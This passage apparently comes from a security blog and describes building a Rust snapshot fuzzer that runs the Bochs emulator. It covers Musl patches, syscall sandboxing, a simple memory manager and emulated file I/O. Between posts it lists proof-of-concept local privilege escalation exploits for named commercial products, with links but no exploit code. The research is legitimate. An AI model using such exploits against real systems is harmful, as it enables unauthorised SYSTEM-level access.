MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
/* -4095...-1 cast to void * will crash on dereference anyway,
* so don't bloat the init code checking for error codes and
* explicitly calling a_crash(). */
} else {
// Check to see if we're running under Lucid or not
if (!g_lucid_ctx) { mem = builtin_tls; }
else { mem = &g_lucid_ctx->tls; }
}
/* Failure to initialize thread pointer is always fatal. */
if (__init_tp(__copy_tls(mem)) < 0)
a_crash();
On the Lucid side, that mock TLS area is mirrored with a Rust struct in the execution context:
#[repr(C)]
#[derive(Clone)]
pub struct Tls {
padding0: [u8; 8], // char c
padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
pub errno: i32,
padding2: [u8; 144], // Additional padding to get to 200-bytes total
padding3: [u8; 128], // 16 void * values
}
So now for example, if during a read
syscall, we get passed a NULL buffer, we can return an error code and set errno
appropriately from the syscall handler in Lucid:
// Now we need to make sure the buffer passed to read isn't NULL
let buf_p = a2 as *mut u8;
if buf_p.is_null() {
context.tls.errno = libc::EINVAL;
return -1_i64 as u64;
}
There may still be other accesses to fs
and gs
that I'm not currently sandboxing, but we haven't reached that part of development yet.
Building Bochs
I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I was also worried that it would be difficult, since getting vanilla Bochs built --static-pie
was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means we'll need a compiler we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn't enough. Bochs, being a C++ codebase, also requires access to standard C++ library functions. This simply could not work as it had previously with the test program, because I didn't have a C++ library that had been built against our custom Musl.
Luckily, there is an awesome project called the musl-cross-make
project, which aims to help people build their own Musl toolchains from scratch. This is perfect for us because we require a complete toolchain: we need to support the C++ standard library, and it needs to be built with our custom Musl. To do this, we use the GNU C++ Library, libstdc++, that is part of the gcc
project.
musl-cross-make
will pull down all of the constituent toolchain components and create a from-scratch toolchain that utilizes a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes is recompile that Musl libc with the custom patches we make for Lucid, and then use the toolchain to compile Bochs as --static-pie
. It really was as simple as:
- git clone musl-cross-make
- configure an x86_64 tool chain target
- build the tool chain
- go into its Musl directory, apply our Musl patches
- configure Musl to build/install into the musl-cross-make output directory
- re-build Musl libc
- configure Bochs to use the new toolchain and set the
--static-pie
flag
This is the Bochs configuration file that I used to build Bochs:
#!/bin/sh
CC="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"
CXX="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"
CFLAGS="-Wall --static-pie -fPIE"
CXXFLAGS="$CFLAGS"
export CC
export CXX
export CFLAGS
export CXXFLAGS
./configure --enable-sb16 \
--enable-all-optimizations \
--enable-long-phy-address \
--enable-a20-pin \
--enable-cpu-level=6 \
--enable-x86-64 \
--enable-vmx=2 \
--enable-pci \
--enable-usb \
--enable-usb-ohci \
--enable-usb-ehci \
--enable-usb-xhci \
--enable-busmouse \
--enable-e1000 \
--enable-show-ips \
--enable-avx \
--with-nogui
This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and will also include an already-built Bochs binary.
Implementing a Simple MMU
Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk
, mmap
, and munmap
. Our test program was very simple and we hadn't come across these syscalls yet.
These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk
calls to use and mmap
calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.
So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap
call ourselves when we set up the MMU
as part of the execution context initialization routine:
// Structure to track memory usage in Bochs
#[derive(Clone)]
pub struct Mmu {
pub brk_base: usize, // Base address of brk region, never changes
pub brk_size: usize, // Size of the program break region
pub curr_brk: usize, // The current program break
pub mmap_base: usize, // Base address of the `mmap` pool
pub mmap_size: usize, // Size of the `mmap` pool
pub curr_mmap: usize, // The current `mmap` page base
pub next_mmap: usize, // The next allocation base address
}
impl Mmu {
pub fn new() -> Result<Self, LucidErr> {
// We don't care where it's mapped
let addr = std::ptr::null_mut::<libc::c_void>();
// Straight-forward
let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;
// This is normal
let prot = libc::PROT_WRITE | libc::PROT_READ;
// This might change at some point?
let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;
// No file backing
let fd = -1 as libc::c_int;
// No offset
let offset = 0 as libc::off_t;
// Try to `mmap` this block
let result = unsafe {
libc::mmap(
addr,
length,
prot,
flags,
fd,
offset
)
};
if result == libc::MAP_FAILED {
return Err(LucidErr::from("Failed `mmap` memory for MMU"));
}
// Create MMU
Ok(Mmu {
brk_base: result as usize,
brk_size: DEFAULT_BRK_SIZE,
curr_brk: result as usize,
mmap_base: result as usize + DEFAULT_BRK_SIZE,
mmap_size: DEFAULT_MMAP_SIZE,
curr_mmap: result as usize + DEFAULT_BRK_SIZE,
next_mmap: result as usize + DEFAULT_BRK_SIZE,
})
}
Handling memory-management syscalls actually wasn't too difficult; there were some gotchas early on, but we managed to get something working fairly quickly.
Handling brk
brk is a syscall used to increase the size of the data segment in your program. A typical pattern you'll see is that the program will call brk(0)
, which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000)
, and you can see that in the Bochs strace
output:
[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0) = 289704
brk(NULL) = 0x555555d7c000
brk(0x555555d7e000) = 0x555555d7e000
So in our syscall handler, I have the following logic for brk
:
// brk
0xC => {
// Try to update the program break
if context.mmu.update_brk(a1).is_err() {
fault!(contextp, Fault::InvalidBrk);
}
// Return the program break
context.mmu.curr_brk as u64
},
This is effectively a wrapper around the update_brk
method we've implemented for Mmu
, so let's look at that:
// Logic for handling a `brk` syscall
pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
    // If addr is NULL, there's nothing to do, just return
if addr == 0 { return Ok(()); }
// Check to see that the new address is in a valid range
let limit = self.brk_base + self.brk_size;
if !(self.curr_brk..limit).contains(&addr) { return Err(()); }
// So we have a valid program break address, update the current break
self.curr_brk = addr;
Ok(())
}
So if we get a NULL argument in a1
, we have nothing to do; nothing in the current MMU state needs adjusting, we simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of brk
memory is large enough to accommodate the request, and if it is, we adjust the current program break and return that to the caller.
Remember, this is so simple because we've already pre-allocated all of the memory, so we don't need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.
Handling mmap
and munmap
mmap is a bit more involved, but still easy to track through. For mmap
calls, there's more state we need to track because there are essentially "allocations" taking place that we need to keep in mind. Most mmap
calls will have a NULL argument for address because they don't care where the memory mapping takes place in virtual memory; in that case, we default to our main method do_mmap
that we've implemented for Mmu
:
// If a1 is NULL, we just do a normal mmap
if a1 == 0 {
if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
fault!(contextp, Fault::InvalidMmap);
}
    // Successful regular mmap
return context.mmu.curr_mmap as u64;
}
// Logic for handling a `mmap` syscall with no fixed address support
pub fn do_mmap(
&mut self,
len: usize,
prot: usize,
flags: usize,
fd: usize,
offset: usize
) -> Result<(), ()> {
// Page-align the len
let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);
// Make sure we have capacity left to satisfy this request
if len + self.next_mmap > self.mmap_base + self.mmap_size {
return Err(());
}
// Sanity-check that we don't have any weird `mmap` arguments
if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
return Err(())
}
if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
return Err(())
}
if fd as i64 != -1 {
return Err(())
}
if offset != 0 {
return Err(())
}
// Set current to next, and set next to current + len
self.curr_mmap = self.next_mmap;
self.next_mmap = self.curr_mmap + len;
// curr_mmap now represents the base of the new requested allocation
Ok(())
}
Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap
memory pool, we check to make sure the other arguments are what we're anticipating, and then we simply update the current offset and the next offset. This way we know where to allocate from next time, while also being able to return the current allocation base back to the caller.
There is also a case where mmap
will be called with a non-NULL address and MAP_FIXED
flags meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:
[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0) = 289704
brk(NULL) = 0x555555d7c000
brk(0x555555d7e000) = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
For this special case, there is really nothing for us to do since that address is in the brk
pool. We already know about that memory, we've already created it, so this last mmap
call you see above amounts to a NOP for us; there is nothing to do but return the address back to the caller.
At this time, we don't support MAP_FIXED
calls for non-brk pool memory.
For munmap
, we also treat this operation as a NOP and return success to the user because we're not concerned with freeing or re-using memory at this time.
You can see that Bochs does quite a bit of brk
and mmap
calls and our fuzzer is now capable of handling them all via our MMU:
...
brk(NULL) = 0x555555d7c000
brk(0x555555d7e000) = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000) = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
...
File I/O
With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:
open(".bochsrc", O_RDONLY|O_LARGEFILE) = 3
close(3) = 0
writev(2, [{iov_base="00000000000i[ ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[ ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE) = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024
The way I've approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future where we're fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it'd be nice to already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward; we really only need to keep a little metadata and the file contents themselves:
#[derive(Clone)]
pub struct FileTable {
files: Vec<File>,
}
impl FileTable {
// We will attempt to open and read all of our required files ahead of time
pub fn new() -> Result<Self, LucidErr> {
// Retrieve .bochsrc
let args: Vec<String> = std::env::args().collect();
// Check to see if we have a "--bochsrc-path" argument
if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
return Err(LucidErr::from("No `--bochsrc-path` argument"));
}
// Search for the value
let mut bochsrc = None;
for (i, arg) in args.iter().enumerate() {
if arg == "--bochsrc-path" {
if i >= args.len() - 1 {
return Err(
LucidErr::from("Invalid `--bochsrc-path` value"));
}
bochsrc = Some(args[i + 1].clone());
break;
}
}
if bochsrc.is_none() { return Err(
LucidErr::from("No `--bochsrc-path` value provided")); }
let bochsrc = bochsrc.unwrap();
// Try to read the file
let Ok(data) = read(&bochsrc) else {
return Err(LucidErr::from(
&format!("Unable to read data BLEGH from '{}'", bochsrc)));
};
// Create a file now for .bochsrc
let bochsrc_file = File {
fd: 3,
path: ".bochsrc".to_string(),
contents: data.clone(),
cursor: 0,
};
// Insert the file into the FileTable
Ok(FileTable {
files: vec![bochsrc_file],
})
}
// Attempt to open a file
pub fn open(&mut self, path: &str) -> Result<i32, ()> {
// Try to find the requested path
for file in self.files.iter() {
if file.path == path {
return Ok(file.fd);
}
}
// We didn't find the file, this really should never happen?
Err(())
}
// Look a file up by fd and then return a mutable reference to it
pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
self.files.iter_mut().find(|file| file.fd == fd)
}
}
#[derive(Clone)]
pub struct File {
pub fd: i32, // The file-descriptor Bochs has for this file
pub path: String, // The file-path for this file
pub contents: Vec<u8>, // The actual file contents
pub cursor: usize, // The current cursor in the file
}
So when Bochs asks to read
a file and provides the fd
, we just check the FileTable
for the correct file, read its contents from the File::contents
buffer, and then update the cursor
struct member to keep track of our current offset in the file.
// read
0x0 => {
// Check to make sure we have the requested file-descriptor
let Some(file) = context.files.get_file(a1 as i32) else {
println!("Non-existent file fd: {}", a1);
fault!(contextp, Fault::NoFile);
};
// Now we need to make sure the buffer passed to read isn't NULL
let buf_p = a2 as *mut u8;
if buf_p.is_null() {
context.tls.errno = libc::EINVAL;
return -1_i64 as u64;
}
// Adjust read size if necessary
let length = std::cmp::min(a3, file.contents.len() - file.cursor);
// Copy the contents over to the buffer
unsafe {
std::ptr::copy(
file.contents.as_ptr().add(file.cursor), // src
buf_p, // dst
length); // len
}
// Adjust the file cursor
file.cursor += length;
// Success
length as u64
},
open
calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:
// open
0x2 => {
// Get pointer to path string we're trying to open
let path_p = a1 as *const libc::c_char;
// Make sure it's not NULL
if path_p.is_null() {
fault!(contextp, Fault::NullPath);
}
// Create c_str from pointer
let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };
// Create Rust str from c_str
let Ok(path_str) = c_str.to_str() else {
fault!(contextp, Fault::InvalidPathStr);
};
// Validate open flags: we only expect O_RDONLY|O_LARGEFILE (0x8000)
if a2 as i32 != 32768 {
println!("Unhandled open flags: {}", a2);
fault!(contextp, Fault::Syscall);
}
// Open the file
let fd = context.files.open(path_str);
if fd.is_err() {
println!("Non-existent file path: {}", path_str);
fault!(contextp, Fault::NoFile);
}
// Success
fd.unwrap() as u64
},
// Attempt to open a file
pub fn open(&mut self, path: &str) -> Result<i32, ()> {
// Try to find the requested path
for file in self.files.iter() {
if file.path == path {
return Ok(file.fd);
}
}
// We didn't find the file
Err(())
}
And that's really the whole of file I/O right now. Down the line, we'll need to keep these in mind when we're taking and resetting snapshots, because the file state will need to be restored differentially, but this is a problem for another day.
Conclusion
The work continues on the fuzzer, and I'm still having a blast implementing it. Special thanks to everyone mentioned in the repository for their help! Next, we'll have to pick a fuzzing target and get it running in Bochs. We'll have to lobotomize the system Bochs is emulating so that it runs our target program in a way we can snapshot and fuzz appropriately. That should be really fun, until then!
CVE-2023-7016-POC
POC for the flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows that allows an attacker to execute code at a SYSTEM level via local access.
https://github.com/ewilded/CVE-2023-7016-POC
CVE-2024-0197-POC
Proof of concept for Local Privilege Escalation in Thales Sentinel HASP LDK.
CVE-2023-38041 POC
Ivanti Pulse Secure Client Connect Local Privilege Escalation CVE-2023-38041 Proof of Concept: https://github.com/ewilded/CVE-2023-38041-POC (there are two versions: one highly accurate thanks to its use of oplocks and directory junctions, and one less accurate that uses oplocks only).
CVE-2024-25376 POC
CVE-2024-25376 - Local Privilege Escalation in TUSBAudio POC (driver installers after v5.40.0 and before v5.68.0 are affected). Reference: https://www.thesycon.de/eng/usb_audiodriver.shtml#SecurityAdvisory
Fuzzer Development 2: Sandboxing Syscalls
Introduction
If you haven't heard, we're developing a fuzzer on the blog these days. I don't even know if "fuzzer" is the right word for what we're building; it's almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as: we were too lazy to implement our own x86_64 emulator from scratch, so we've literally taken a complete emulator and stuffed it into our own process to use. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else are simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs, and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we'll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we'll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs, but for now let's focus on syscalls.
This fuzzer was conceived of and implemented originally by Brandon Falk.
There will be no repo changes with this post.
Syscalls
Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel-provided utility or function. Context switching simply means changing the context in which code is executing. When you're adding integers or reading/writing memory, your process is executing in user-mode within your process's virtual address space. But if you want to open a socket or file, you need the kernel's help. To do this, you make a syscall, which tells the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode, go to kernel-mode, and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code; that way, once the kernel is done with your request, it can return gracefully to executing your user-mode process.
Context-switching can be thought of as switching from executing one process to another. In our case, we're switching from Bochs execution to Lucid execution. Bochs is doing its thing, reading/writing memory, doing arithmetic, etc., but when it needs the kernel's help it attempts to make a syscall. When this occurs, we need to:
- recognize that Bochs is trying to syscall (this isn't always easy to do, weirdly)
- intercept execution and redirect to the appropriate code path
- save Bochs' execution state
- execute our Lucid logic in place of the kernel (think of Lucid as Bochs' kernel)
- return gracefully to Bochs by restoring its state
C Library
Normally programmers don't have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library, and it's these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance, if you use the C library function for open
, you're not directly making a syscall; you're calling into the library's open
function, and that function is the one emitting a syscall
instruction that actually performs the context switch into the kernel. Doing things this way takes a lot of the portability work off the programmer's shoulders, because the guts of the library functions perform all of the conditional checks for environment variables and execute accordingly. Programmers just call the open
function and don't have to worry about things like syscall numbers, error handling, etc., as those things are kept abstracted and uniform in the code exported to the programmer.
This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it's going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that checks whether or not Bochs is executing under Lucid; if it is, we can direct execution to Lucid instead of the kernel. In pseudocode, we can achieve something like the following:
fn syscall()
if lucid:
lucid_syscall()
else:
normal_syscall()
Musl
Musl is a C library that is meant to be "lightweight." This gives us some simplicity to work with vs. something like Glibc, which is a monstrosity, an affront to God. Importantly, Musl has a great reputation for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how the syscall-invoking wrapper functions work, so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.
In this post we'll be working with Musl 1.2.4, which is the latest version as of this writing.
Baby Steps
Instead of jumping straight into Bochs, we'll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:
#include <stdio.h>
#include <unistd.h>
#include <lucid.h>
int main(int argc, char *argv[]) {
printf("Argument count: %d\n", argc);
printf("Args:\n");
for (int i = 0; i < argc; i++) {
printf(" -%s\n", argv[i]);
}
size_t iters = 0;
while (1) {
printf("Test alive!\n");
sleep(1);
iters++;
if (iters == 5) { break; }
}
printf("g_lucid_ctx: %p\n", g_lucid_ctx);
}
The program will just tell us its argument count, print each argument, stay alive for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and the pointer will be NULL otherwise. So how do we accomplish this?
Execution Context Tracking
Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether it's running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs, so we need a vehicle to do that.
What I've done is create my own header file, lucid.h, and place it in Musl. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it's compiled against Musl. So in the header file right now we've defined a lucid_ctx data structure, and we've also created a global instance of one called g_lucid_ctx:
// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
// This must always be the first member of this struct
size_t exit_handler;
int save_inst;
size_t save_size;
size_t lucid_save_area;
size_t bochs_save_area;
struct register_bank register_bank;
size_t magic;
} lucid_ctx_t;
// Pointer to the global execution context, if running inside Lucid, this will
// point to a struct lucid_ctx_t inside the Fuzzer
lucid_ctx_t *g_lucid_ctx;
Program Start Under Lucid
So in Lucid's main function right now we do the following:
- Load Bochs
- Create an execution context
- Jump to Bochs' entry point and start executing
When we jump to Bochs' entry point, one of the earliest functions called is a Musl function named _dlstart_c, located in the source file dlstart.c. Right now, we create that global execution context on the heap in Lucid, and then we pass its address in the arbitrarily chosen register r15. This whole function will have to change eventually because we'll want to context-switch from Lucid to Bochs to perform this in the future, but for now this is all we do:
pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
// rdx: we have to clear this register as the ABI specifies that exit
// hooks are set when rdx is non-null at program start
//
// rax: arbitrarily used as a jump target to the program entry
//
// rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
// have to manually set it with a `mov`
//
// r15: holds a pointer to the execution context, if this value is non-
// null, then Bochs learns at start time that it is running under Lucid
//
// We don't really care about execution order as long as we specify clobbers
// with out/lateout, that way the compiler doesn't allocate a register we
// then immediately clobber
unsafe {
asm!(
"xor rdx, rdx",
"mov rsp, {0}",
"mov r15, {1}",
"jmp rax",
in(reg) bochs.rsp,
in(reg) Box::into_raw(context),
in("rax") bochs.entry,
lateout("rax") _, // Clobber (inout so no conflict with in)
out("rdx") _, // Clobber
out("r15") _, // Clobber
);
}
}
So when we jump to Bochs' entry point having come from Lucid, r15 should hold the address of the execution context. In _dlstart_c, we can check r15 and act accordingly. Here are the additions I made to Musl's start routine:
